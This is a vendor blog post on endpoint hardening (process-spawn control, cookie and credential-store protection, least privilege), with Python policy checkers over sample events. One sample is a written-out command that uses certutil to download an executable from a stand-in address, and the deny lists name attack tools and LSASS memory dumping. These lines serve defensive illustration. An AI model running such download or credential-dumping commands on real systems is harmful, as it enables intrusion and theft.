Securing Endpoints By Applying ‘Passive Income’ Concepts

September 8, 2023 Andrey Pozhogin


Investing in cybersecurity is a lot like working hard to save for retirement. Your budget’s already tight, but you must secure the future. You’re faced with endless headlines and market updates that make you nervous about making the wrong choices – or not making moves quickly enough amid fast-changing conditions. Under pressure, many focus on identifying the investments (effort, time, money) that are best positioned to keep generating income for you while requiring little or no maintenance. In other words, work smart – not hard.

This makes sense in the cybersecurity world, too. You should ask yourself what passive income ideas may help you achieve your cybersecurity goals faster.

Of course, it’s easier said than done. But some no-nonsense cybersecurity “investments” continuously generate “income” in the form of saved time, calmer nerves and fewer expended resources. Every cybersecurity professional should look for focal points: the places where risk concentrates and that show up again and again in attack kill chains of every kind. Then set up rules that reduce or eliminate the attack surface around these points, so that legitimate work continues normally while anyone trying to use them for nefarious purposes (or anything else) finds it extremely difficult.

Here are some focal points that you can focus (pun intended) on to break most attack chains:

Focal Point No. 3: Break Common Exploit Techniques

Many exploits take advantage of software bugs, vulnerabilities or legitimate functionality to make an application operate in ways that assist attackers. Many are relatively easy to carry out, particularly those requiring minimal user interaction. A recent example of low interaction is CVE-2023-36884, for which, according to the CVE description, an attacker needs “… a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.”

Convince the victim to open the file? I mean, what could be easier? …

“Dear HR, please find my CV attached.”

All set!

Okay, so what should be the “passive income” investment here? What we need to prevent is an application spawning a child process it has no legitimate reason to start, and above all one that ends up running with elevated privileges: opening a Word document or a PDF should never result in PowerShell or cmd.exe being launched. The technique is called child and parent process control. It protects against a whole class of exploits targeting PowerShell, MS Office, Adobe Acrobat and many other applications, whatever the specific vulnerability being exploited happens to be.
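The control described above, as an added example that is not part of the original post and not CyberArk’s own rule set: a child and parent process control policy in Python, evaluated over constructed process-creation records whose fields mirror Sysmon Event ID 1. The list of content-handling applications, the list of denied children, the integrity-level rule and the sample events are all assumptions made for this illustration.

```python
"""Child and parent process control as a policy check over
process-creation events (fields mirror Sysmon Event ID 1).
All sample events below are constructed for this example."""
from dataclasses import dataclass

# Applications that open attacker-controlled content (documents, PDFs, mail).
# Example policy list, not a vendor rule set.
CONTENT_HANDLERS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "acrobat.exe", "acrord32.exe",
}

# Children a content handler has no legitimate reason to start.
DENIED_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe",
}

# Windows integrity levels, ordered so they can be compared.
INTEGRITY_RANK = {"Low": 0, "Medium": 1, "High": 2, "System": 3}


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    parent_integrity: str   # integrity level of the parent process
    integrity: str          # integrity level of the new child process
    command_line: str


def image_name(path: str) -> str:
    """Case-insensitive file name of a Windows image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: ProcessEvent) -> str:
    """Return 'allow' or a 'block: <reason>' verdict for one process start."""
    parent = image_name(event.parent_image)
    child = image_name(event.image)

    if parent not in CONTENT_HANDLERS:
        return "allow"   # this policy only constrains content handlers

    if child in DENIED_CHILDREN:
        return f"block: {parent} spawned {child}"

    # A child running at a higher integrity level than its parent means the
    # content handler obtained an elevation it has no business obtaining.
    if INTEGRITY_RANK[event.integrity] > INTEGRITY_RANK[event.parent_integrity]:
        return f"block: {parent} spawned {child} at {event.integrity} integrity"

    return "allow"


# Constructed sample events: one benign (Word starting the print helper),
# two that the policy should stop. 198.51.100.7 is a documentation address.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\splwow64.exe", "Medium", "Medium",
                 "splwow64.exe 12288"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\cmd.exe", "Medium", "Medium",
                 r'cmd.exe /c "certutil -urlcache -f http://198.51.100.7/a.exe %TEMP%\a.exe"'),
    ProcessEvent(r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
                 r"C:\Users\hr\AppData\Local\Temp\update.exe", "Medium", "High",
                 "update.exe /quiet"),
]


def audit(events=SAMPLE_EVENTS) -> list[str]:
    """Apply the policy to every event and return the verdicts in order."""
    return [evaluate(e) for e in events]


if __name__ == "__main__":
    for verdict in audit():
        print(verdict)
```

The second rule is the one that matters for the “elevated mode” case: it fires on any child of a content handler whose integrity level exceeds its parent’s, even if the child’s file name is not on the denied list, so renaming the dropped payload does not help the attacker.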

Focal Point No. 2: Make Your Web Browser a Secure Browser

Session hijacking has become the attacker’s weapon of choice. It’s beautiful in its simplicity. All you need to do is steal the session cookies from the target’s machine (a small database file in the browser profile), which can provide access to the victim’s email, documents or cloud configuration consoles. The scariest thing about session hijacking is that it bypasses every user authentication system IT puts in place, including multi-factor authentication (MFA): the stolen cookie is proof of a session that has already been authenticated, so the attacker is never asked to log in.

The focal point here is the browser, of course. We must restrict access to the browser’s memory and cookie store with privilege threat protection, so that nothing but the browser itself can read them. By preventing cookie theft on the endpoint, we thwart session hijacking regardless of which tool the attacker drops on the machine to harvest session data.

This “investment” is quickly rising in importance as more and more threat actors turn to attacking browsers, since a hijacked browser session can give them access to critical systems and sensitive data: financial transaction systems, SCADA control and cloud configuration consoles, security tool web interfaces, data lakes and email systems.

Focal Point No. 1: Defend Credentials Everywhere

Another focal point common to many attacks is credentials: user and administrator passwords, password hashes and security tokens. Security professionals set up IT systems in a way that scatters credentials and other bits of trust (tokens, hashes, cookies, certificates) across endpoints. If attackers can access those items, they can gain persistence, move laterally, elevate privileges and deliver impact. In a recent example, a threat actor dubbed Storm-0558, according to Microsoft, “… accesses credentials from a variety of sources, including the LSASS process memory and Security Account Manager (SAM) registry hive. … once Storm-0558 has access to the desired user credentials, the actor signs into the compromised user’s cloud email account with the valid account credentials.”

And in yet another data breach, at least “…179,000 AWS Console credentials, 2,300 Google Cloud credentials, 64,500 DocuSign credentials, 15,500 QuickBooks credentials, 23,000 Salesforce credentials, 66,000 CRM credentials” were stolen with information stealers and listed for sale. Information stealers are a type of malware that harvests data stored by applications such as web browsers, email clients, instant messengers, cryptocurrency wallets, FTP clients and gaming services: in other words, data scattered across every machine in every organization, waiting to be found and stolen by attackers.

By blocking access to the various credential stores within the operating system and third-party applications, you protect your users and endpoints from a large number of threats at once, which makes this technique a terrific piece of passive cybersecurity income. CyberArk Endpoint Privilege Manager ships with over 50 different rules that prevent credential and security token theft, and new rules are constantly added and delivered dynamically to endpoints. One recent example is a rule for workstations and servers that protects Discord, a popular communication platform, against several data theft methods, which can help prevent a data breach.
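Both the cookie-store protection of Focal Point No. 2 and the credential-store protection above come down to the same policy: only the owning application may open a store, and only a handful of system processes may read LSASS memory. The following Python is an added example, not code from this post or from CyberArk Endpoint Privilege Manager, that checks such a policy over constructed file-open and process-access events (the LSASS fields follow Sysmon Event ID 10). The store paths are the usual per-profile locations; the owner sets, the LSASS allowlist, the process names and the sample events are assumptions chosen for the illustration.

```python
"""Store-access control for browser cookies, saved logins, messenger
tokens and LSASS, as a policy check over constructed endpoint events."""
from dataclasses import dataclass
from fnmatch import fnmatchcase


def norm(path: str) -> str:
    """Lower-case, forward-slash form so the glob patterns match predictably."""
    return path.replace("\\", "/").lower()


def image_name(path: str) -> str:
    """File name component of an image path, normalized."""
    return norm(path).rsplit("/", 1)[-1]


# (label, glob over the normalized path, images allowed to open it).
# Paths are the usual per-profile locations; the owner sets are an
# example policy chosen for this illustration, not a vendor rule set.
STORE_POLICY = [
    ("chrome cookies", "*/appdata/local/google/chrome/user data/*/network/cookies", {"chrome.exe"}),
    ("chrome saved logins", "*/appdata/local/google/chrome/user data/*/login data", {"chrome.exe"}),
    ("edge cookies", "*/appdata/local/microsoft/edge/user data/*/network/cookies", {"msedge.exe"}),
    ("firefox cookies", "*/appdata/roaming/mozilla/firefox/profiles/*/cookies.sqlite", {"firefox.exe"}),
    ("discord token store", "*/appdata/roaming/discord/local storage/leveldb/*", {"discord.exe"}),
]

PROCESS_VM_READ = 0x0010   # access right needed to read another process's memory
LSASS_READERS = {"csrss.exe", "wininit.exe", "msmpeng.exe"}   # example allowlist


@dataclass(frozen=True)
class FileOpen:
    image: str      # process opening the file
    path: str       # file being opened


@dataclass(frozen=True)
class ProcessAccess:
    source_image: str
    target_image: str
    granted_access: int   # access mask, as in Sysmon Event ID 10


def evaluate(event) -> str:
    """Return 'allow' or a 'block: ...' verdict for one event."""
    if isinstance(event, FileOpen):
        caller, path = image_name(event.image), norm(event.path)
        for label, pattern, owners in STORE_POLICY:
            if fnmatchcase(path, pattern):
                return "allow" if caller in owners else f"block: {caller} opened {label}"
        return "allow"   # not a protected store

    if isinstance(event, ProcessAccess):
        if image_name(event.target_image) != "lsass.exe":
            return "allow"
        if (event.granted_access & PROCESS_VM_READ) == 0:
            return "allow"   # this mask cannot read LSASS memory
        caller = image_name(event.source_image)
        if caller in LSASS_READERS:
            return "allow"
        return f"block: {caller} opened lsass.exe with 0x{event.granted_access:x}"

    raise TypeError(f"unsupported event: {event!r}")


# Constructed sample events. cv.exe stands in for an infostealer dropped
# from a "CV" attachment; the other names are the usual system images.
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
CHROME_COOKIES = r"C:\Users\hr\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"
STEALER = r"C:\Users\hr\AppData\Local\Temp\cv.exe"
LSASS = r"C:\Windows\System32\lsass.exe"

SAMPLE_EVENTS = [
    FileOpen(CHROME, CHROME_COOKIES),
    FileOpen(STEALER, CHROME_COOKIES),
    FileOpen(STEALER, r"C:\Users\hr\AppData\Roaming\discord\Local Storage\leveldb\000005.ldb"),
    ProcessAccess(r"C:\Windows\System32\svchost.exe", LSASS, 0x1000),
    ProcessAccess(r"C:\Users\hr\AppData\Local\Temp\procdump64.exe", LSASS, 0x1FFFFF),
    ProcessAccess(r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe", LSASS, 0x1010),
]


def audit(events=SAMPLE_EVENTS) -> list[str]:
    """Apply the policy to every event and return the verdicts in order."""
    return [evaluate(e) for e in events]


if __name__ == "__main__":
    for verdict in audit():
        print(verdict)
```

The LSASS rule keys on the access mask rather than on the tool’s name: a handle without PROCESS_VM_READ (0x1000, PROCESS_QUERY_LIMITED_INFORMATION, as used for routine process enumeration) is left alone, while any non-allowlisted image asking for a mask that can read memory is blocked, whether it calls itself procdump64.exe or something innocuous.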

Focal Point No. 0: Abuse of User Privileges

Preventing the abuse of user privileges should be first on the list, but we felt it could be a little repetitive if you read our blog regularly, hence the zero. Beating a dead horse would be the proverbial description, except the horse is still very much alive. While everyone seemingly agrees on this security best practice, that no user should work under a local admin account, we still see organizations where users keep working as admins. CISA issued an advisory focused on detecting advanced persistent threat (APT) activity targeting Outlook Online that includes the following among its general cloud-migration recommendations: “Separate administrator accounts from user accounts according to the National Institute of Standards and Technology’s (NIST’s) guidance, AC-5: Separation of Duties.” and “Only allow designated administrator accounts to be used for administration purposes. If an individual user requires administrative rights over their workstation, use a separate account without administrative access to other hosts.”

My take regarding endpoint privilege security is even more radical: No user should have local admin rights. Period. CyberArk Endpoint Privilege Manager can take care of the necessary elevations whenever a user requires elevated privileges. And for any conceivable scenario in which policies are too rigid to permit an automatic elevation, there are several ways to resolve it quickly, including just-in-time (JIT) policies and offline authorization. These methods are much quicker than having a system administrator remotely connect to your machine. And if you do work as a local administrator, you’re taking on enormous risk, because cyber incidents are bound to happen.

Breaking the Attack Kill Chain (The Easy Way)

So, there you have it. Take care of these focal points. Thankfully, it’s relatively easy to do (given the right tools) and is a set-and-forget activity, just like passive income! Once set, attacks will keep hitting a wall, because the attackers find themselves disarmed and toolless. We can’t promise that after reading this post you’ll have a clear roadmap to financial independence and early retirement, but we hope you found some helpful advice here that will save you some time and maybe a grey hair or two.

Author’s note: Oh, by the way, CyberArk Endpoint Privilege Manager has these and many more threat mitigation rules as a part of QuickStart – our rapid risk reduction and least privilege framework.

Andrey Pozhogin is a senior product marketing manager at CyberArk.
